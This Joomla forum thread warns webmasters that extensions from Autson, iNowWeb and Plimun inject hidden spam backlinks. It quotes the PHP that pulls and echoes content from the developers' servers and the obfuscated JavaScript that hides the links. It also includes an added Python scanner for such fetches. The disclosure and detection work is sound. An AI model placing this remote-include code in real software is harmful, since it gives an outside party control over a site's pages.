Remove extensions from Autson/iNowWeb/Plimun - Malicious !!

alphaprodigy
Joomla! Fledgling
Posts: 2
Joined: Fri Mar 22, 2013 10:55 pm

Remove extensions from Autson/iNowWeb/Plimun - Malicious !!

Post by alphaprodigy » Sat Mar 23, 2013 12:45 am

This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).

Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and can do whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.

The most popular vulnerable extensions are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

The hidden backlinks are being inserted via the following code:

Code:

<?php 
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
or

Code:

<?php 
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>
etc. The file on their server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.


This is what that code is inserting into the site:

Code:

<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
		
<p class="dnn"By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
or

Code:

<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>

<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
Additional extensions from these developers that are possibly vulnerable as well:

iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show

Plimun.com:
- Plimun Twitter Ticker
- Twitter Show

I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displaying hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr

So what can we do to stop these spammers/hackers?

1. Remove the extensions from your or your clients' websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to . They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:

Code:

autson.com , inowweb.com , plimun.com
The actions of developers like this adversely affect the entire Joomla community and we must do something to stop it.
Last edited by mandville on Sat Mar 23, 2013 6:41 pm, edited 1 time in total.
Reason: retitled to be more descriptive. malicious backlink code is not a vulnerability or exploit. Links found in generated code without proof of site control or infection.
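
Added example (not part of the original thread): a Python scanner for the remote-fetch pattern shown in the first post. It flags the three domains named there and also any other hard-coded http(s) fetch in a module's PHP files, since a later reply notes that more code than the quoted lines may be involved. The function names and the sample module tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Domains named in the first post of this thread.
KNOWN_DOMAINS = ("autson.com", "inowweb.com", "plimun.com")

# PHP calls given an http(s) URL literal; whitespace after "//" is tolerated.
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|fopen|readfile|curl_init|include|require)(?:_once)?"
    r"\s*\(?\s*['\"]\s*https?:\s*//\s*([^'\"\s/]+)",
    re.IGNORECASE,
)


def scan_php_source(text):
    """Return (line_no, call, host, known_bad) for each remote fetch in text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in REMOTE_FETCH.finditer(line):
            host = m.group(2).lower()
            known = any(host == d or host.endswith("." + d) for d in KNOWN_DOMAINS)
            findings.append((line_no, m.group(1).lower(), host, known))
    return findings


def scan_tree(root):
    """Scan every .php file under root, e.g. a site's modules/ directory."""
    results = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            results[path.relative_to(root).as_posix()] = hits
    return results


def demo():
    # Constructed sample files; the third fetches from a host not on the list.
    samples = {
        "mod_AddThisForJoomla/mod_AddThisForJoomla.php":
            "<?php\n$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);\n"
            "echo $credit;\n?>",
        "mod_AutsonSlideShow/tmpl/default.php":
            "<?php\n$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);\n"
            "echo $credit;\n?>",
        "mod_other/mod_other.php":
            "<?php\n$feed = file_get_contents(\"https://feeds.example.org/a.xml\");\n",
        "mod_clean/mod_clean.php": "<?php\necho file_get_contents(__DIR__.'/a.txt');\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(rel, hits)
```

Point scan_tree at a site's modules directory; hits on hosts outside the list are for manual review, not proof of malice.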

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by mandville » Sat Mar 23, 2013 5:10 am

It is actions like this that get a dev banned from the Jed. This dev was banned long ago
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

alphaprodigy
Joomla! Fledgling
Posts: 2
Joined: Fri Mar 22, 2013 10:55 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by alphaprodigy » Sat Mar 23, 2013 7:14 am

Yes, the developer was banned, but it went unnoticed for so long that now there are over 20,000 infected websites out there. I made this thread to hopefully bring more attention to the vulnerable extensions mentioned above so that the affected webmasters can be alerted to the problem and act accordingly. I know it's unrealistic to reach every webmaster, but every little bit helps.

delhidjinn
Joomla! Apprentice
Posts: 17
Joined: Mon Apr 27, 2009 6:21 pm
Location: New Delhi, India
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by delhidjinn » Wed Mar 27, 2013 3:12 pm

Thank you for this warning. Two of my most important websites were infected via the extension AddThis. I have gone ahead and removed this extension as well as the Facebook slider.

Much obliged to you for saving my websites.
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."

Webdongle
Joomla! Master
Posts: 44019
Joined: Sat Apr 05, 2008 9:58 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by Webdongle » Wed Mar 27, 2013 3:21 pm

alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mandville » Wed Mar 27, 2013 4:21 pm

Also to note that occasionally a developer will upload a clean extension to the jed for checking and then once the hits start rolling in, upload a dodgy package to their website.

brian
Joomla! Master
Posts: 12781
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by brian » Wed Mar 27, 2013 4:44 pm

Webdongle wrote:
alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?
The JED can only react to reports. I personally spotted this issue and reported it to the JED who took action immediately
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

Webdongle
Joomla! Master
Posts: 44019
Joined: Sat Apr 05, 2008 9:58 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by Webdongle » Wed Mar 27, 2013 5:05 pm

brian wrote:...
The JED can only react to reports. ...
I recall a post where it was stated that extensions were checked for malicious code in an extension before it was accepted ?

brian
Joomla! Master
Posts: 12781
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by brian » Wed Mar 27, 2013 5:08 pm

Sadly it's not possible to ensure that the version uploaded is the same as the version that is available for download. Nor is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release

Webdongle
Joomla! Master
Posts: 44019
Joined: Sat Apr 05, 2008 9:58 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by Webdongle » Wed Mar 27, 2013 5:53 pm

brian wrote:... Nor is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release
That's a good point ... pity there are not more people checking.

delhidjinn
Joomla! Apprentice
Posts: 17
Joined: Mon Apr 27, 2009 6:21 pm
Location: New Delhi, India
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by delhidjinn » Thu Mar 28, 2013 2:38 am

I have become economical in the use of Joomla extensions. Especially since I have upgraded to Joomla 2.5. The migration was a headache as many extensions either had been discontinued or the upgrade was not available.

Plus my most valuable site was hacked due to doorways in certain extensions. Even paid extensions.

Joomla is a robust platform. With almost a minimal use of extensions, I have brought my expectations down and do not opt for the fancy stuff immediately.

Still, even then I had been beguiled into believing that some extensions are okay, which it seems they are not.

Nowadays I am very strict in incorporating extensions in my website. Some extensions I cannot do without, and have to use them.

I believe, eventually in a few years' time, Joomla would have most of the basic requirements of a website built in native.

jfdutoit
Joomla! Apprentice
Posts: 12
Joined: Mon Mar 28, 2011 2:43 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by jfdutoit » Mon Apr 08, 2013 11:19 am

Wow, I'm quite surprised that someone would go to so much effort to contact and inform website owners about these malicious extensions.

I received a random email from a certain Tom E informing me of Add-This, etc.

Although I am grateful that he notified me, I am surprised that someone would go to such great lengths to let me know. My website (ezywebsites.co.za) is one of the 20 000 mentioned in the first post.

Yet, as soon as I get a chance, I'll check all my clients.
Francois du Toit
Webpreneur
Latest Niche Site: http://www.health2u.co.za/during-pregnancy
http://www.ezywebsites.co.za

Vering
Joomla! Apprentice
Posts: 24
Joined: Sat Mar 17, 2012 6:53 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by Vering » Tue Apr 09, 2013 4:00 pm

You have my greatest thanks, alphaprodigy. I've immediately removed the malicious code from the Autson Slideshow.

suklamc
Joomla! Fledgling
Posts: 1
Joined: Tue Apr 09, 2013 11:06 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by suklamc » Tue Apr 09, 2013 11:11 pm

Additional Behaviour noticed with [spam] for Joomla! :

The extension was used/evaluated for use for website(s) by me/us, and some peculiar behaviour was noticed.

1> The above-mentioned extension used to load unsecure code. (We accidentally discovered it when we enabled site-wide SSL/HTTPS a few months ago.) When LinkedIn (and maybe social options were selected), a nasty browser warning (for loading unsecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension).

2> Another aspect worth mentioning: the above-mentioned backlinks are not loaded in some configurations (but are definitely loaded when LinkedIn is selected), which suggests there may be more lines of code controlling the backlink's behaviour.

Hence I suggest you rephrase/remove (or just remove the malicious code)

as this may give a false sense of security that the issue has been fixed by removing a few lines of code (and something else may get missed)

luigipepe
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 22, 2012 2:11 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by luigipepe » Sun Apr 14, 2013 9:07 am

I also received an email from someone at a gmail account warning me that my site was infected and pointing me to this thread. The code was there so I disabled and uninstalled the addthis extension that was causing the problem and the code is now gone. THANK YOU SO MUCH for letting me know, much appreciated!

Now does anyone know of a reliable free alternative to the addthis social sharing extension? This has put me off a little and I'm not sure what to choose anymore...

Luigi

mark4740
Joomla! Apprentice
Posts: 5
Joined: Mon Apr 08, 2013 9:06 pm
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mark4740 » Tue Apr 16, 2013 10:07 am

Thanks for the email. I seem to have removed the script and deleted the plugin. Seems to only have been on my home page as I can't see it on any of the other page sources (I hope). Does anyone know a safe plugin for the Twitter/Facebook/Google icons on my website so I can tweet/like post new products I list?

mark4740
Joomla! Apprentice
Posts: 5
Joined: Mon Apr 08, 2013 9:06 pm
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mark4740 » Tue Apr 16, 2013 10:02 pm

I'm surprised there have not been more comments on this. I have had the rogue plugin on my site for over 10 months; with over 20,000 sites affected, thought this topic would be bigger than it is?

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mandville » Tue Apr 16, 2013 11:35 pm

mark4740 wrote: I'm surprised there have not been more comments on this. I have had the rogue plugin on my site for over 10 months; with over 20,000 sites affected, thought this topic would be bigger than it is?
You are relying on the belief that people feel compelled to come here and say "me2" "+1" "i owe you my first born".
The OP did their apparent civic duty informing people of the issue; this is not the proverbial field of dreams.
People downloaded and installed the extensions, got caught, got notified and hopefully removed it. End of most people's stories regarding this developer.

edirect
Joomla! Fledgling
Posts: 1
Joined: Sat Apr 20, 2013 3:29 am

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by edirect » Sat Apr 20, 2013 3:36 am

I would like to say thanks to whomever tipped me off. I sent them an email, but maybe they will see it here.

Anyway, thank you.

jw

techdoctor_gr
Joomla! Fledgling
Posts: 1
Joined: Sat Apr 27, 2013 4:01 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by techdoctor_gr » Sat Apr 27, 2013 4:06 pm

Thanks for the email, the script was removed when I deleted the plugin!

paulfoos
Joomla! Apprentice
Posts: 9
Joined: Thu Feb 12, 2009 4:32 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by paulfoos » Mon Feb 03, 2014 5:04 pm

I got burned by this extension, and found out the hard way, had to search through my site for the vulnerability. I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow. Joomla has almost no control over extensions, unlike other CMSs. I hope to get all my Joomla sites converted to Drupal soon.

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mandville » Mon Feb 03, 2014 6:22 pm

paulfoos wrote: had to search through my site for the vulnerability.
with all due respect please do not confuse "malicious" with "vulnerable"
I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow.
the extensions are listed there http://vel.joomla.org/articles/844-spot ... sions.html Published on Tuesday, 27 August 2013

quite often extensions downloaded from the devs website have "extra" code not in the zip provided to jed for checking

